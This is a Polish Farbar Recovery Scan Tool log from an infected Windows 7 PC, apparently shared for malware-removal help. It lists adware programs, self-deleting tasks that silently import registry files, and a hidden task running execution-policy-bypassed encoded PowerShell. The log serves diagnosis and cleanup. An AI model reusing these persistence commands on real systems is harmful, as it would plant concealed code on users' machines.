Rezultaty skanu uzupełniającego Farbar Recovery Scan Tool (x64) Wersja: 12-06-2017
Uruchomiony przez ABBA (13-06-2017 12:38:14)
Uruchomiony z C:\Users\ABBA\Downloads
Windows 7 Professional Service Pack 1 (X64) (2017-05-12 19:23:08)
Tryb startu: Normal
==========================================================


==================== Konta użytkowników: =============================

ABBA (S-1-5-21-3347351025-225361290-299367054-1000 - Administrator - Enabled) => C:\Users\ABBA
Administrator (S-1-5-21-3347351025-225361290-299367054-500 - Administrator - Disabled)
Gość (S-1-5-21-3347351025-225361290-299367054-501 - Limited - Disabled)

==================== Centrum zabezpieczeń ========================

(Załączenie wejścia w fixlist spowoduje jego usunięcie.)

AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Zainstalowane programy ======================

(W fixlist dozwolone tylko załączanie programów adware z flagą "Hidden" w celu ich uwidocznienia. Programy adware powinny zostać w poprawny sposób odinstalowane.)

1.0.0.1 (HKLM-x32\...\YeaDesktop) (Version: 1.0.0.1 - )
7-Zip 16.04 (x64 edition) (HKLM\...\{23170F69-40C1-2702-1604-000001000000}) (Version: 16.04.00.0 - Igor Pavlov)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 17.009.20044 - Adobe Systems Incorporated)
Adobe Flash Player 24 NPAPI (HKLM-x32\...\{1D95F7C4-A547-4FC9-91A4-A35B19F597C0}) (Version: 24.0.0.194 - Adobe Systems Incorporated)
Adobe Flash Player 24 PPAPI (HKLM-x32\...\{00D77C52-95CA-4E13-9ED1-1FE49E8F2D49}) (Version: 24.0.0.194 - Adobe Systems Incorporated)
Age of Wonders 3 (HKLM-x32\...\Age of Wonders 3_is1) (Version: 1.8.0.2 - Triumph Studios)
AMD Catalyst Install Manager (HKLM\...\{37FCE154-7F59-74F0-3A35-BF503CEB230B}) (Version: 8.0.877.0 - Advanced Micro Devices, Inc.)
Anti-Vibrate Oscar Editor (HKLM-x32\...\InstallShield_{5600BE52-805C-4847-93F2-7921116ED0B3}) (Version: 12.08.0005 - A4TECH)
BS.Player FREE (HKLM-x32\...\BSPlayerf) (Version: 2.71.1081 - AB Team, d.o.o.)
Don't Starve Together (HKLM\...\Steam App 322330) (Version:  - Klei Entertainment)
DriverMax 9 (HKLM-x32\...\DMX5_is1) (Version: 9.31.0.206 - Innovative Solutions)
Europa Universalis IV (HKLM\...\Steam App 236850) (Version:  - Paradox Development Studio)
Fraps (HKLM-x32\...\Fraps) (Version:  - )
Free Download Manager (HKLM\...\{43781dff-e0df-49ce-a6d2-47da96a485e7}}_is1) (Version:  - FreeDownloadManager.ORG)
Generic Universal PCL (HKLM\...\Generic Universal PCL) (Version:  - Generic)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 58.0.3029.110 - Google Inc.)
Google Update Helper (x32 Version: 1.3.33.5 - Google Inc.) Hidden
Heroes of Might and Magic 4 Complete (HKLM-x32\...\Heroes of Might and Magic 4 Complete_is1) (Version:  - GOG.com)
Heroes of Might And Magic IV: Equilibris (HKLM-x32\...\Equilibris) (Version:  - )
Java 8 Update 121 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180121F0}) (Version: 8.0.1210.13 - Oracle Corporation)
LSI HDA Modem (HKLM\...\LSI Soft Modem) (Version: 2.2.100 - LSI Corporation)
Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft Office Professional 2016 - pl-pl (HKLM\...\ProfessionalRetail - pl-pl) (Version: 16.0.8067.2115 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3347351025-225361290-299367054-1000\...\OneDriveSetup.exe) (Version: 17.3.6799.0327 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23026 (HKLM-x32\...\{e46eca4f-393b-40df-9f49-076faf788d83}) (Version: 14.0.23026.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23026 (HKLM-x32\...\{74d0e5db-b326-4dae-a6b2-445b9de1836e}) (Version: 14.0.23026.0 - Microsoft Corporation)
Office 16 Click-to-Run Extensibility Component (Version: 16.0.8067.2115 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (Version: 16.0.8067.2115 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (Version: 16.0.7668.2066 - Microsoft Corporation) Hidden
Online Application (x32 Version: 2.6.0 - Microleaves) Hidden <==== UWAGA
OSCAR Editor (x32 Version: 12.08.0005 - A4TECH) Hidden
Search module (HKLM-x32\...\Search module) (Version:  - Goobzo) <==== UWAGA
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Steel Division: Normandy 44 (HKLM-x32\...\Steel Division: Normandy 44_is1) (Version:  - )
System Healer (HKLM-x32\...\SystemHealer) (Version: 4.4.0.3 - SystemHealer) <==== UWAGA
The Battle for Middle-earth (tm) II (HKLM-x32\...\{2A9F95AB-65A3-432c-8631-B8BC5BF7477A}) (Version:  - )
The Lord of the Rings, The Rise of the Witch-king (HKLM-x32\...\{B931FB80-537A-4600-00AD-AC5DEDB6C25B}) (Version:  - )
YoutubeAdBlock (HKLM-x32\...\E3605470-291B-44EB-8648-745EE356599A) (Version: 2.0.0.248 - Company Inc.) <==== UWAGA

==================== Niestandardowe rejestracje CLSID (filtrowane): ==========================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

CustomCLSID: HKU\S-1-5-21-3347351025-225361290-299367054-1000_Classes\CLSID\{162C6FB5-44D3-435B-903D-E613FA093FB5}\InprocServer32 -> C:\Users\ABBA\AppData\Local\Microsoft\OneDrive\17.3.6799.0327\amd64\FileCoAuthLib64.dll (Microsoft Corporation)

==================== Zaplanowane zadania (filtrowane) =============

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

Task: {1FA7787D-E001-440B-8F78-6A90C0B67F78} - System32\Tasks\DriverMaxAgent => C:\Program Files (x86)\Innovative Solutions\DriverMax\drivermax.exe [2017-05-09] (Innovative Solutions)
Task: {22F0B089-E16D-4E2D-BCFE-C41BE43688C8} - System32\Tasks\DriverMaxWelcome => C:\Program Files (x86)\Innovative Solutions\DriverMax\drivermax.exe [2017-05-09] (Innovative Solutions)
Task: {272329ED-57C8-4DCD-B381-F1545C96B284} - System32\Tasks\psv_Gravelam => cmd.exe /c regedit.exe /s "C:\ProgramData\AppriabuS\Free-Dox.reg" &amp; del "C:\ProgramData\AppriabuS\Free-Dox.reg" &amp; SCHTASKS /Delete /TN "psv_Gravelam" /F <==== UWAGA
Task: {443B203D-30EA-4815-BED3-B4D3795F3C98} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-04-25] (Adobe Systems Incorporated)
Task: {45AE2A38-DA0C-4818-A515-F4164751F0EA} - System32\Tasks\psv_Softlex => cmd.exe /c regedit.exe /s "C:\ProgramData\AppriabuS\HoldFresh.reg" &amp; del "C:\ProgramData\AppriabuS\HoldFresh.reg" &amp; SCHTASKS /Delete /TN "psv_Softlex" /F <==== UWAGA
Task: {480AC5AC-7410-4CEF-858C-149819C78172} - System32\Tasks\System Healer Task => C:\Program Files (x86)\SystemHealer\RescueMonitor.exe [2016-12-26] () <==== UWAGA
Task: {4C70AA96-CBFE-4C85-BD09-DD13AA05230B} - System32\Tasks\psv_Ontoin => cmd.exe /c regedit.exe /s "C:\ProgramData\AppriabuS\Treeis.reg" &amp; del "C:\ProgramData\AppriabuS\Treeis.reg" &amp; SCHTASKS /Delete /TN "psv_Ontoin" /F <==== UWAGA
Task: {4DB5856F-7FCC-4160-9244-B43B3963BA1A} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2017-05-14] (Microsoft Corporation)
Task: {4F3F91C2-4B97-4982-B2E2-BF56C1E73A68} - System32\Tasks\Updater_Online_Application => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe [2017-04-18] (Microleaves) <==== UWAGA
Task: {4FECAAB3-D2DE-4A3F-B30D-3D2D48935C66} - System32\Tasks\E3605470-291B-44EB-8648-745EE356599A2 => Rundll32.exe "C:\Program Files (x86)\YtubeABlckU\ErT7J6V.dll",#1
Task: {5326893D-65F6-41B5-987F-64944B92404F} - System32\Tasks\SystemHealer Monitor => C:\Program Files (x86)\SystemHealer\HealerConsole.exe [2016-12-26] () <==== UWAGA
Task: {67163D51-2C87-4F0D-A642-D96375997C94} - \snp -> Brak pliku <==== UWAGA
Task: {67CBC653-A1EA-484C-9208-7A3E3475F9A2} - System32\Tasks\{7A0F0D47-0F0B-0B0E-7D11-787E0C0F1108} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwAgACAAIAAgACAAOwAgACAAIAA7ACAAOwA7ADsAIAA7ADsAIAAgADsAOwA7ACAAOwAgACAAOwA7ADsAOwAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBzAHQAbwBwACIAOwAkAHMAYwA9ACIAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUA (dane wartości zawierają 10072 znaków więcej). <==== UWAGA
Task: {70E8C2AC-CE19-4CB7-A64D-60E966D41D32} - System32\Tasks\Online Application V2G1 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-02-07] (Microleaves LTD) <==== UWAGA
Task: {7709290C-886B-47A0-B6E5-7B93A5D558F1} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerLogon => C:\Program Files\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2017-05-26] ()
Task: {786D3046-7915-49ED-AE02-A4A85E69E63E} - System32\Tasks\FreeDownloadManagerNetworkMonitor => C:\Program Files\FreeDownloadManager.ORG\Free Download Manager\winwfpmonitor.exe [2017-05-18] (FreeDownloadManager.org)
Task: {7CBB39E2-31D5-4780-9B99-9292C66AE4F0} - System32\Tasks\psv_Tamp-Zap => cmd.exe /c regedit.exe /s "C:\ProgramData\AppriabuS\Inchfind.reg" &amp; del "C:\ProgramData\AppriabuS\Inchfind.reg" &amp; SCHTASKS /Delete /TN "psv_Tamp-Zap" /F <==== UWAGA
Task: {7F42AF9E-F076-4E33-AE96-1A235BF22664} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-05-25] (Google Inc.)
Task: {8E87D8EB-925F-4017-8F11-3FDB37AE1EE2} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2017-05-14] (Microsoft Corporation)
Task: {987E8443-F673-4E9A-B5F6-2C477B4A50C9} - \snf -> Brak pliku <==== UWAGA
Task: {9ABAB7AC-8C1F-4899-B9B4-240D0DE78826} - System32\Tasks\Online Application V2G3 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-02-07] (Microleaves LTD) <==== UWAGA
Task: {AD456F62-9032-4D67-982B-EFF665609522} - System32\Tasks\System HealerStartUp => C:\Program Files (x86)\SystemHealer\SystemHealer.exe [2016-12-26] () <==== UWAGA
Task: {B1FB20EF-B3E2-4B18-BCD5-592E4A03FD4F} - System32\Tasks\psv_Saotouch => cmd.exe /c regedit.exe /s "C:\ProgramData\AppriabuS\Lamstring.reg" &amp; del "C:\ProgramData\AppriabuS\Lamstring.reg" &amp; SCHTASKS /Delete /TN "psv_Saotouch" /F <==== UWAGA
Task: {C1956C73-47CE-42E1-8EB4-98B2C98C8D5A} - System32\Tasks\E3605470-291B-44EB-8648-745EE356599A => Rundll32.exe "C:\Program Files (x86)\YtubeABlckU\ErT7J6V.dll",#1
Task: {C7F32682-3F97-4A7F-AFDC-970F3CC0903A} - System32\Tasks\System HealerPeriod => C:\Program Files (x86)\SystemHealer\SystemHealer.exe [2016-12-26] () <==== UWAGA
Task: {CA501574-8E28-469A-AC45-809F0BB9AC85} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerRegistration => C:\Program Files\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2017-05-26] ()
Task: {D19FD346-3054-4EFB-9A6E-98CE8E2A4AC9} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-05-25] (Google Inc.)
Task: {D506D427-12AD-44C8-93E4-88DB5D230545} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_24_0_0_194_pepper.exe [2017-05-12] (Adobe Systems Incorporated)
Task: {D9854AD6-5789-42CA-B9C6-FF1F2F02CC23} - System32\Tasks\Application Starter - f1375f225883e83d52e8db9690775c3c => C:\Program Files (x86)\Innovative Solutions\DriverMax\innostp.exe [2017-05-09] (Innovative Solutions)
Task: {E100684C-27BA-4968-8EAE-44FB71BA8BBD} - System32\Tasks\Online Application V2G2 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-02-07] (Microleaves LTD) <==== UWAGA
Task: {EE00D26D-C1D9-4972-8B97-C6776D4F7005} - System32\Tasks\psv_LabToron => cmd.exe /c regedit.exe /s "C:\ProgramData\AppriabuS\Vilabam.reg" &amp; del "C:\ProgramData\AppriabuS\Vilabam.reg" &amp; SCHTASKS /Delete /TN "psv_LabToron" /F <==== UWAGA
Task: {F55D037A-88BE-41DA-B2DD-19642D17B8AC} - System32\Tasks\DriverMax Notification => C:\Program Files (x86)\Innovative Solutions\DriverMax\drivermax.exe [2017-05-09] (Innovative Solutions)
Task: {F64CAD2A-59A3-483C-8E3F-3C983180333B} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-05-12] (Adobe Systems Incorporated)

(Załączenie wejścia w fixlist spowoduje przesunięcie pliku zadania (.job). Plik uruchamiany docelowo przez zadanie nie zostanie przeniesiony.)

Task: C:\Windows\Tasks\Adobe Flash Player PPAPI Notifier.job => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_24_0_0_194_pepper.exe
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\E3605470-291B-44EB-8648-745EE356599A.job => C:\Program Files (x86)\YtubeABlckU\ErT7J6V.dll
Task: C:\Windows\Tasks\Online Application V2G1.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== UWAGA
Task: C:\Windows\Tasks\Online Application V2G2.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== UWAGA
Task: C:\Windows\Tasks\Online Application V2G3.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== UWAGA
Task: C:\Windows\Tasks\System HealerPeriod.job => C:\Program Files (x86)\SystemHealer\SystemHealer.exe <==== UWAGA
Task: C:\Windows\Tasks\System HealerStartUp.job => C:\Program Files (x86)\SystemHealer\SystemHealer.exe <==== UWAGA
Task: C:\Windows\Tasks\Updater_Online_Application.job => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe <==== UWAGA

==================== Skróty =============================

(Wybrane wejścia mogą zostać załączone w celu ich zresetowania lub usunięcia.)

ShortcutWithArgument: C:\Users\ABBA\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\69639df789022856\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 1"

==================== Załadowane moduły (filtrowane) ==============

2017-05-15 22:36 - 2017-03-05 09:35 - 00022528 _____ () C:\Windows\System32\us005lm.dll
2017-05-26 18:50 - 2017-05-18 16:15 - 00029696 _____ () C:\Program Files\FreeDownloadManager.ORG\Free Download Manager\WinDivert.dll
2016-12-26 12:19 - 2016-12-26 12:19 - 01582240 _____ () C:\Program Files (x86)\SystemHealer\HealerConsole.exe
2017-05-12 22:48 - 2017-06-13 12:27 - 00017920 _____ () C:\Windows\System32\rpcnetp.exe
2017-05-26 18:50 - 2017-04-13 11:42 - 02158592 _____ () C:\Program Files\FreeDownloadManager.ORG\Free Download Manager\avformat-57.dll
2017-05-26 18:50 - 2017-04-13 11:42 - 12242432 _____ () C:\Program Files\FreeDownloadManager.ORG\Free Download Manager\avcodec-57.dll
2017-05-26 18:50 - 2017-04-13 11:42 - 00138752 _____ () C:\Program Files\FreeDownloadManager.ORG\Free Download Manager\swresample-2.dll
2017-05-26 18:50 - 2017-04-13 11:42 - 00485376 _____ () C:\Program Files\FreeDownloadManager.ORG\Free Download Manager\avutil-55.dll
2017-05-26 18:50 - 2017-04-13 11:42 - 01825792 _____ () C:\Program Files\FreeDownloadManager.ORG\Free Download Manager\avfilter-6.dll
2017-05-26 18:50 - 2017-04-13 11:42 - 00662016 _____ () C:\Program Files\FreeDownloadManager.ORG\Free Download Manager\swscale-4.dll
2017-05-26 18:50 - 2017-04-13 11:46 - 69740544 _____ () C:\Program Files\FreeDownloadManager.ORG\Free Download Manager\libcef.dll
2017-05-26 18:50 - 2017-04-13 11:45 - 02323456 _____ () C:\Program Files\FreeDownloadManager.ORG\Free Download Manager\libglesv2.dll
2017-05-26 18:50 - 2017-04-13 11:45 - 00094208 _____ () C:\Program Files\FreeDownloadManager.ORG\Free Download Manager\libegl.dll
2012-08-17 11:44 - 2012-08-17 11:44 - 03345408 _____ () C:\Program Files (x86)\Anti-Vibrate Oscar Editor\OscarEditor.exe
2017-06-13 11:50 - 2017-06-13 11:50 - 00126976 _____ () C:\Users\ABBA\AppData\Roaming\67b8914af1d4424090aa08cd7787f6af\kirlSC3gvg.exe
2013-06-18 15:49 - 2013-06-18 15:49 - 00016384 _____ () C:\Program Files (x86)\ATI Technologies\ATI.ACE\Branding\Branding.dll
2013-04-29 23:08 - 2013-04-29 23:08 - 00369152 _____ () C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLI.Aspect.CrossDisplay.Graphics.Dashboard.dll
2017-06-13 12:00 - 2017-06-13 12:00 - 00343552 _____ () C:\ProgramData\AppriabuS\U-Ronfax.dll
2017-05-25 11:38 - 2017-05-09 11:13 - 03767640 _____ () C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\libglesv2.dll
2017-05-25 11:38 - 2017-05-09 11:13 - 00100696 _____ () C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\libegl.dll
2017-06-13 11:55 - 2017-06-13 11:55 - 00732160 _____ () C:\Program Files (x86)\YtubeABlckIE\mkdVacp9z.exe
2017-05-12 22:11 - 2017-05-09 08:26 - 00010544 _____ () C:\Program Files (x86)\Innovative Solutions\DriverMax\sync.dll
2010-12-02 17:56 - 2010-12-02 17:56 - 00815104 _____ () C:\Program Files (x86)\Anti-Vibrate Oscar Editor\Data\X7H\Forms\OSD_Text\OSD_Text.dll
2011-01-09 20:45 - 2011-01-09 20:45 - 00088064 _____ () C:\Program Files (x86)\Anti-Vibrate Oscar Editor\DLL\DLL_MouseDeviceManager.dll
2012-06-14 15:59 - 2012-06-14 15:59 - 02414080 _____ () C:\Program Files (x86)\Anti-Vibrate Oscar Editor\Data\X7H\Forms\ScreenCapture\ScreenCapture.dll
2012-05-17 11:17 - 2012-05-17 11:17 - 01000448 _____ () C:\Program Files (x86)\Anti-Vibrate Oscar Editor\Data\X7H\Forms\TrayIconWebAdvertisement\TrayIconWebAdvertisement.dll
2010-09-20 14:18 - 2010-09-20 14:18 - 00085504 _____ () C:\Program Files (x86)\Anti-Vibrate Oscar Editor\DLL\DLL_ZoomControl.dll
2010-09-20 14:18 - 2010-09-20 14:18 - 00054272 _____ () C:\Program Files (x86)\Anti-Vibrate Oscar Editor\DLL\DLL_ScrollbarControl.dll
2011-04-12 15:14 - 2011-04-12 15:14 - 00063488 _____ () C:\Program Files (x86)\Anti-Vibrate Oscar Editor\DLL\DLL_AnalyzeGesturesInRight.dll
2010-11-01 20:16 - 2010-11-01 20:16 - 00062976 _____ () C:\Program Files (x86)\Anti-Vibrate Oscar Editor\DLL\DLL_AnalyzeGesturesInOne.dll
2012-04-27 11:40 - 2012-04-27 11:40 - 00118272 _____ () C:\Program Files (x86)\Anti-Vibrate Oscar Editor\DLL\DLL_Wheel4D.dll
2017-06-13 11:55 - 2017-06-13 11:55 - 00877568 _____ () C:\Program Files (x86)\YtubeABlckIE\ku2wY4T.dll
2017-06-13 11:55 - 2017-06-13 11:55 - 00548864 _____ () C:\Program Files (x86)\YtubeABlckIE\fdd1yA.dll

==================== Alternate Data Streams (filtrowane) =========

(Załączenie wejścia w fixlist spowoduje usunięcie strumienia ADS.)


==================== Tryb awaryjny (filtrowane) ===================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Wartość "AlternateShell" zostanie przywrócona.)


==================== Powiązania plików (filtrowane) ===============

(Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci.)


==================== Internet Explorer - Witryny zaufane i z ograniczeniami ===============

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru.)


==================== Hosts - zawartość: ===============================

(Użycie dyrektywy Hosts: w fixlist spowoduje reset pliku Hosts.)

2009-07-14 04:34 - 2017-06-13 12:31 - 00000824 _____ C:\Windows\system32\Drivers\etc\hosts


==================== Inne obszary ============================

(Obecnie brak automatycznej naprawy dla tej sekcji.)

HKU\S-1-5-21-3347351025-225361290-299367054-1000\Control Panel\Desktop\\Wallpaper -> 
DNS Servers: 192.168.1.254
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)
Zapora systemu Windows [funkcja włączona]

==================== MSCONFIG/TASK MANAGER - Wyłączone elementy ==


==================== Reguły Zapory systemu Windows (filtrowane) ===============

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [TCP Query User{D5C62BE5-0E60-411A-98C3-237029766954}C:\program files\freedownloadmanager.org\free download manager\fdm.exe] => (Block) C:\program files\freedownloadmanager.org\free download manager\fdm.exe
FirewallRules: [UDP Query User{1CE8FBCF-1877-4C9D-8550-A41B3B5AC767}C:\program files\freedownloadmanager.org\free download manager\fdm.exe] => (Block) C:\program files\freedownloadmanager.org\free download manager\fdm.exe
FirewallRules: [TCP Query User{9B7DA599-9DC4-42D5-8CD7-31668AF5E777}C:\program files (x86)\google\chrome\application\chrome.exe] => (Block) C:\program files (x86)\google\chrome\application\chrome.exe
FirewallRules: [UDP Query User{E40758D1-DA70-4E9F-954D-F759F9CE2E43}C:\program files (x86)\google\chrome\application\chrome.exe] => (Block) C:\program files (x86)\google\chrome\application\chrome.exe

==================== Punkty Przywracania systemu =========================

08-06-2017 11:01:30 Zaplanowany punkt kontrolny
08-06-2017 19:34:28 Zainstalowany program DirectX
08-06-2017 21:05:52 Zainstalowany program DirectX
08-06-2017 21:57:37 Instalacja pakietu sterownika urządzenia: SysProgs.org Kontrolery magazynu
13-06-2017 12:07:39 Installed Microsoft Solution - B4164D8C-3813-495A-BBBC-BA51D122A226
13-06-2017 12:18:01 Restore Point Created by FRST

==================== Wadliwe urządzenia w Menedżerze urządzeń =============

Name: Teredo Tunneling Pseudo-Interface
Description: Karta tunelowania Teredo firmy Microsoft
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.

Name: 
Description: 
Class Guid: 
Manufacturer: 
Service: 
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.


==================== Błędy w Dzienniku zdarzeń: =========================

Dziennik Aplikacja:
==================
Error: (06/13/2017 12:28:57 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (06/13/2017 12:25:59 PM) (Source: Wininit) (EventID: 1015) (User: )
Description: Błąd krytycznego procesu systemowego C:\Windows\system32\lsm.exe z kodem stanu 1. Komputer musi być ponownie uruchomiony.

Error: (06/13/2017 12:21:52 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (06/13/2017 12:18:02 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Przetwarzanie wywołania OnIdentity() w obiekcie System Writer przez Usługi kryptograficzne nie powiodło się.

Details:
AddWin32ServiceFiles: Unable to back up image of service rpcnetp since QueryServiceConfig API failed

System Error:
Nie można odnaleźć określonego pliku.
.

Error: (06/13/2017 12:07:43 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Przetwarzanie wywołania OnIdentity() w obiekcie System Writer przez Usługi kryptograficzne nie powiodło się.

Details:
AddWin32ServiceFiles: Unable to back up image of service rpcnetp since QueryServiceConfig API failed

System Error:
Nie można odnaleźć określonego pliku.
.

Error: (06/13/2017 11:52:33 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (06/13/2017 11:51:22 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (06/12/2017 11:02:51 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (06/12/2017 10:30:05 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nazwa aplikacji powodującej błąd: starter.exe, wersja: 1.0.0.1, sygnatura czasowa: 0x593ef3b8
Nazwa modułu powodującego błąd: KERNELBASE.dll, wersja: 6.1.7601.18409, sygnatura czasowa: 0x53159a86
Kod wyjątku: 0xe0434f4d
Przesunięcie błędu: 0x0000c42d
Identyfikator procesu powodującego błąd: 0x1908
Godzina uruchomienia aplikacji powodującej błąd: 0x01d2e3ba8300460c
Ścieżka aplikacji powodującej błąd: C:\Users\ABBA\AppData\Local\Temp\36dd37531d8c45a3b69d29be16e9c005\starter.exe
Ścieżka modułu powodującego błąd: C:\Windows\syswow64\KERNELBASE.dll
Identyfikator raportu: ea926dfe-4fad-11e7-b4f8-00247ead38c0

Error: (06/12/2017 10:22:12 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.


Dziennik System:
=============
Error: (06/13/2017 12:27:53 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: Poprzednie zamknięcie systemu przy 12:26:47 na ‎2017-‎06-‎13 było nieoczekiwane.

Error: (06/13/2017 12:26:14 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Usługa AppriabuS niespodziewanie zakończyła pracę. Wystąpiło to razy: 1.

Error: (06/13/2017 12:25:12 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Usługa Agere Modem Call Progress Audio niespodziewanie zakończyła pracę. Wystąpiło to razy: 1.

Error: (06/13/2017 12:21:31 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Nie można uruchomić usługi MaohaWiFiService z powodu następującego błędu: 
Nie można odnaleźć określonego pliku.

